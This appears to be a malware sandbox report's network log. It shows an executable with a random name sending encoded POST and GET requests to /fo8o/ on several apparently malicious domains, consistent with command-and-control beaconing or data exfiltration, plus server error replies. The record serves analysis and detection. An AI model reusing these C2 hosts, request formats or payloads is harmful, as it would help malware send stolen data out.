                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      2 | 192.168.2.6 | 49860 | 116.50.37.244 | 80 | 6392 | C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Dec 2, 2024 14:31:42.011331081 CET | 831 | OUT | POST /fo8o/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Host: www.goldenjade-travel.com
                                                                                      Origin: http://www.goldenjade-travel.com
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 236
                                                                                      Referer: http://www.goldenjade-travel.com/fo8o/
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Data Raw: 55 36 59 44 73 78 57 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4c 2b 38 4d 59 48 7a 74 74 63 45 79 78 36 49 63 6a 78 36 42 71 4d 49 4c 35 70 6d 57 4a 4a 49 67 4e 4e 5a 73 74 39 55 32 79 4d 43 39 72 62 30 34 44 61 2f 4e 2f 79 65 36 36 4d 5a 44 48 74 76 63 4b 73 66 4e 62 64 44 56 77 78 59 62 68 33 49 42 6c 34 6f 55 62 37 2b 37 47 5a 41 4d 57 31 6b 47 43 73 6e 30 4a 45 6d 4f 75 35 50 55 78 76 76 30 6b 59 5a 50 72 4e 6b 67 44 5a 4b 4f 5a 4a 43 6f 6b 32 56 4c 70 76 36 4c 44 54 62 32 52 2f 65 78 50 57 71 70 45 38 71 52 6b 5a 74 32 71 6b 44 69 54 6c 36 75 65 6c 78 31 4e 77 4c 69 58 32 4d 73 42 35 37 30 4d 56 38 76 32 42 49 49 68 41 6c 2b 38 2b 42 70 78 61 52 6b 2f 44 62 30 6e 74 44 6e 41 5a 64 45 59 67 3d 3d
                                                                                      Data Ascii: U6YDsxW=GHiKxe4Q6VhKL+8MYHzttcEyx6Icjx6BqMIL5pmWJJIgNNZst9U2yMC9rb04Da/N/ye66MZDHtvcKsfNbdDVwxYbh3IBl4oUb7+7GZAMW1kGCsn0JEmOu5PUxvv0kYZPrNkgDZKOZJCok2VLpv6LDTb2R/exPWqpE8qRkZt2qkDiTl6uelx1NwLiX2MsB570MV8v2BIIhAl+8+BpxaRk/Db0ntDnAZdEYg==
                                                                                      Dec 2, 2024 14:31:43.593022108 CET | 492 | IN | HTTP/1.1 404 Not Found
                                                                                      Content-Type: text/html; charset=us-ascii
                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                      Date: Mon, 02 Dec 2024 13:31:43 GMT
                                                                                      Connection: close
                                                                                      Content-Length: 315
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      3 | 192.168.2.6 | 49867 | 116.50.37.244 | 80 | 6392 | C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Dec 2, 2024 14:31:44.666912079 CET | 1844 | OUT | POST /fo8o/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Host: www.goldenjade-travel.com
                                                                                      Origin: http://www.goldenjade-travel.com
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 1248
                                                                                      Referer: http://www.goldenjade-travel.com/fo8o/
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Data Raw: 55 36 59 44 73 78 57 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4c 2b 38 4d 59 48 7a 74 74 63 45 79 78 36 49 63 6a 78 36 42 71 4d 49 4c 35 70 6d 57 4a 4a 41 67 4e 34 4e 73 75 63 55 32 7a 4d 43 39 30 72 30 35 44 61 2b 4e 2f 7a 32 32 36 4d 56 54 48 75 58 63 4c 4a 44 4e 4d 2f 6e 56 70 68 59 62 73 58 49 41 71 59 70 4f 62 36 4f 2f 47 5a 51 4d 57 31 6b 47 43 75 2f 30 50 52 4b 4f 6f 35 50 58 32 76 76 6f 79 6f 59 53 72 4e 38 4b 44 59 2f 37 5a 2f 79 6f 71 31 74 4c 73 64 43 4c 4f 54 62 30 53 2f 65 70 50 57 6d 36 45 38 6d 64 6b 59 49 62 71 6e 66 69 65 30 2f 78 4c 78 78 5a 52 42 6e 6e 4f 6d 38 30 5a 50 75 46 57 32 35 57 38 33 63 2f 75 7a 74 41 38 6f 49 79 36 5a 78 35 31 51 37 47 6b 34 53 59 56 49 68 50 49 33 76 65 67 37 42 74 6a 76 48 74 63 6e 51 35 58 36 36 46 6f 2f 61 42 35 66 75 57 45 4f 78 51 32 58 67 70 56 6f 63 78 76 32 57 77 2b 4b 4d 2b 33 71 61 42 6f 69 6c 59 36 74 46 42 74 67 56 56 49 78 73 33 66 6b 30 51 50 58 72 61 68 39 70 4c 53 54 37 41 78 58 65 4c 63 70 74 74 44 61 36 75 65 43 48 54 68 55 66 34 45 37 [TRUNCATED]
                                                                                      Data Ascii: U6YDsxW=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 [TRUNCATED]
                                                                                      Dec 2, 2024 14:31:46.276424885 CET | 492 | IN | HTTP/1.1 404 Not Found
                                                                                      Content-Type: text/html; charset=us-ascii
                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                      Date: Mon, 02 Dec 2024 13:31:45 GMT
                                                                                      Connection: close
                                                                                      Content-Length: 315
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      4 | 192.168.2.6 | 49874 | 116.50.37.244 | 80 | 6392 | C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Dec 2, 2024 14:31:47.323075056 CET | 532 | OUT | GET /fo8o/?cPm=bL-XkPyPkF&U6YDsxW=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFxgszkgIsi8wfa6/CPqkeX1kME9DjI2TvouO65OvKk6Nl8OEvQ/8= HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Host: www.goldenjade-travel.com
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Dec 2, 2024 14:31:48.839977980 CET | 492 | IN | HTTP/1.1 404 Not Found
                                                                                      Content-Type: text/html; charset=us-ascii
                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                      Date: Mon, 02 Dec 2024 13:31:48 GMT
                                                                                      Connection: close
                                                                                      Content-Length: 315
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      5 | 192.168.2.6 | 49909 | 85.159.66.93 | 80 | 6392 | C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Dec 2, 2024 14:32:03.229765892 CET | 786 | OUT | POST /fo8o/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Host: www.magmadokum.com
                                                                                      Origin: http://www.magmadokum.com
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 212
                                                                                      Referer: http://www.magmadokum.com/fo8o/
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Data Raw: 55 36 59 44 73 78 57 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 62 4a 72 44 58 6d 7a 45 6b 6b 4b 2b 65 41 4e 6a 6e 42 2f 58 63 78 41 41 64 50 47 4a 53 64 6c 77 41 6f 2b 4c 59 71 50 65 6a 7a 49 30 2b 38 47 36 31 68 36 56 71 51 5a 2f 6e 41 31 35 43 52 7a 30 6f 38 31 47 64 7a 57 32 62 6b 49 42 59 36 52 64 37 4f 63 4a 47 69 32 32 38 68 6b 69 56 41 77 4b 42 66 6f 6d 64 51 57 2f 43 53 33 4a 47 2f 59 53 5a 70 63 58 66 74 30 42 75 77 6c 44 43 67 4f 4f 50 7a 4a 35 30 6b 54 61 43 73 48 69 48 6b 71 2f 30 30 2b 52 30 33 44 49 62 62 52 59 61 52 6d 70 56 78 77 2b 57 74 51 74 38 70 44 4d 45 33 66 48 4b 44 57 78 30 45 4d 51 34 48 77 47 67 79 62 75
                                                                                      Data Ascii: U6YDsxW=nJfHJZySQmokbJrDXmzEkkK+eANjnB/XcxAAdPGJSdlwAo+LYqPejzI0+8G61h6VqQZ/nA15CRz0o81GdzW2bkIBY6Rd7OcJGi228hkiVAwKBfomdQW/CS3JG/YSZpcXft0BuwlDCgOOPzJ50kTaCsHiHkq/00+R03DIbbRYaRmpVxw+WtQt8pDME3fHKDWx0EMQ4HwGgybu


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      6 | 192.168.2.6 | 49916 | 85.159.66.93 | 80 | 6392 | C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Dec 2, 2024 14:32:05.889733076 CET | 810 | OUT | POST /fo8o/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Host: www.magmadokum.com
                                                                                      Origin: http://www.magmadokum.com
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 236
                                                                                      Referer: http://www.magmadokum.com/fo8o/
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Data Raw: 55 36 59 44 73 78 57 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 61 71 44 44 56 42 76 45 6a 45 4b 2f 62 41 4e 6a 74 68 2f 54 63 78 38 41 64 4d 4c 55 54 6f 39 77 41 4a 69 4c 57 4c 50 65 67 7a 49 30 6d 73 47 2f 72 52 36 4f 71 51 55 63 6e 42 4a 35 43 52 50 30 6f 2b 74 47 65 44 71 31 61 30 49 44 56 61 52 44 6d 65 63 4a 47 69 32 32 38 68 67 49 56 41 6f 4b 42 4c 55 6d 53 56 71 77 4d 79 33 49 57 76 59 53 64 70 63 54 66 74 30 7a 75 78 49 6d 43 6c 43 4f 50 79 35 35 30 31 54 46 58 63 48 6b 44 6b 72 4c 38 55 6a 67 35 30 4b 35 45 36 30 35 44 6d 65 33 51 48 78 6b 4b 65 51 4f 75 35 6a 4f 45 31 48 31 4b 6a 57 62 32 45 30 51 71 51 38 68 76 47 2b 4e 69 51 44 5a 76 62 30 45 59 65 44 4f 54 51 68 2f 44 43 72 39 72 51 3d 3d
                                                                                      Data Ascii: U6YDsxW=nJfHJZySQmokaqDDVBvEjEK/bANjth/Tcx8AdMLUTo9wAJiLWLPegzI0msG/rR6OqQUcnBJ5CRP0o+tGeDq1a0IDVaRDmecJGi228hgIVAoKBLUmSVqwMy3IWvYSdpcTft0zuxImClCOPy5501TFXcHkDkrL8Ujg50K5E605Dme3QHxkKeQOu5jOE1H1KjWb2E0QqQ8hvG+NiQDZvb0EYeDOTQh/DCr9rQ==


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      7 | 192.168.2.6 | 49922 | 85.159.66.93 | 80 | 6392 | C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Dec 2, 2024 14:32:08.544080973 CET | 1823 | OUT | POST /fo8o/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Host: www.magmadokum.com
                                                                                      Origin: http://www.magmadokum.com
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 1248
                                                                                      Referer: http://www.magmadokum.com/fo8o/
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Data Raw: 55 36 59 44 73 78 57 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 61 71 44 44 56 42 76 45 6a 45 4b 2f 62 41 4e 6a 74 68 2f 54 63 78 38 41 64 4d 4c 55 54 6f 31 77 42 37 71 4c 57 73 54 65 76 54 49 30 76 4d 47 2b 72 52 36 44 71 52 39 56 6e 42 46 70 43 58 4c 30 71 64 6c 47 66 78 4f 31 52 30 49 44 4a 71 52 43 37 4f 63 6d 47 69 6d 79 38 67 51 49 56 41 6f 4b 42 4e 77 6d 62 67 57 77 4f 79 33 4a 47 2f 59 6b 5a 70 64 32 66 74 38 6a 75 78 4e 54 43 52 2b 4f 4d 53 70 35 35 6a 2f 46 56 38 48 6d 45 6b 72 54 38 55 76 37 35 30 6e 56 45 36 42 55 44 68 75 33 54 6d 77 4d 61 75 45 6d 38 62 43 70 5a 30 37 78 4b 47 4b 50 33 48 63 32 76 79 34 44 69 45 2b 48 36 48 72 46 69 4b 68 63 65 63 72 2b 61 55 59 77 4c 51 2b 36 33 73 63 54 68 32 45 66 54 73 59 6e 4a 78 53 73 4c 30 69 71 70 58 30 78 33 4b 4d 30 58 4f 43 65 38 58 52 63 44 54 56 67 68 69 78 65 41 37 76 38 67 59 46 69 2f 38 6b 65 73 73 4b 79 65 65 31 45 4f 76 4e 38 51 4a 4e 66 55 44 47 4d 67 2b 65 39 79 31 73 68 51 39 75 73 4b 54 73 73 4a 67 76 2f 6d 64 62 70 2f 6f 43 74 33 6c [TRUNCATED]
                                                                                      Data Ascii: U6YDsxW=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 [TRUNCATED]


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      8 | 192.168.2.6 | 49928 | 85.159.66.93 | 80 | 6392 | C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Dec 2, 2024 14:32:11.206867933 CET | 525 | OUT | GET /fo8o/?cPm=bL-XkPyPkF&U6YDsxW=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjNWAySNtnq/EMXCTP7S4oEh8mb9sAZyquFiTVTuU6HpMKOeASrGw= HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Host: www.magmadokum.com
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Dec 2, 2024 14:33:12.634596109 CET | 194 | IN | HTTP/1.0 504 Gateway Time-out
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Type: text/html
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 0a 54 68 65 20 73 65 72 76 65 72 20 64 69 64 6e 27 74 20 72 65 73 70 6f 6e 64 20 69 6e 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <html><body><h1>504 Gateway Time-out</h1>The server didn't respond in time.</body></html>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      9 | 192.168.2.6 | 50020 | 91.195.240.94 | 80 | 6392 | C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Dec 2, 2024 14:33:18.206203938 CET | 789 | OUT | POST /fo8o/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Host: www.rssnewscast.com
                                                                                      Origin: http://www.rssnewscast.com
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 212
                                                                                      Referer: http://www.rssnewscast.com/fo8o/
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Data Raw: 55 36 59 44 73 78 57 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 57 2f 30 4f 35 68 55 50 58 53 72 57 2b 48 41 41 67 71 54 52 6e 45 64 72 65 38 43 58 47 36 77 51 38 50 36 48 62 41 42 6c 4f 4c 58 79 36 76 68 69 4b 58 52 70 69 39 36 54 66 55 62 67 30 62 74 76 71 77 54 4c 6d 76 78 47 2b 35 30 31 68 58 36 4f 4d 6c 71 59 38 42 31 44 57 54 59 4b 41 6c 2f 30 49 45 41 66 6f 68 73 4c 30 56 6c 4a 66 58 39 55 41 2b 4d 6b 55 6c 31 54 53 70 31 59 54 43 7a 54 5a 7a 77 6c 33 62 53 4a 6b 45 46 73 6b 36 4b 5a 6b 37 44 38 70 38 39 4a 64 39 49 54 71 44 51 47 32 64 48 32 67 68 72 61 55 52 44 67 6b 56 55 4f 52 48 32 77 49 51 70 6c 30 4f 4b 65 34 35 36 50
                                                                                      Data Ascii: U6YDsxW=81L18xe3ynKwW/0O5hUPXSrW+HAAgqTRnEdre8CXG6wQ8P6HbABlOLXy6vhiKXRpi96TfUbg0btvqwTLmvxG+501hX6OMlqY8B1DWTYKAl/0IEAfohsL0VlJfX9UA+MkUl1TSp1YTCzTZzwl3bSJkEFsk6KZk7D8p89Jd9ITqDQG2dH2ghraURDgkVUORH2wIQpl0OKe456P
                                                                                      Dec 2, 2024 14:33:19.528923988 CET | 707 | IN | HTTP/1.1 405 Not Allowed
                                                                                      date: Mon, 02 Dec 2024 13:33:19 GMT
                                                                                      content-type: text/html
                                                                                      content-length: 556
                                                                                      server: Parking/1.0
                                                                                      connection: close
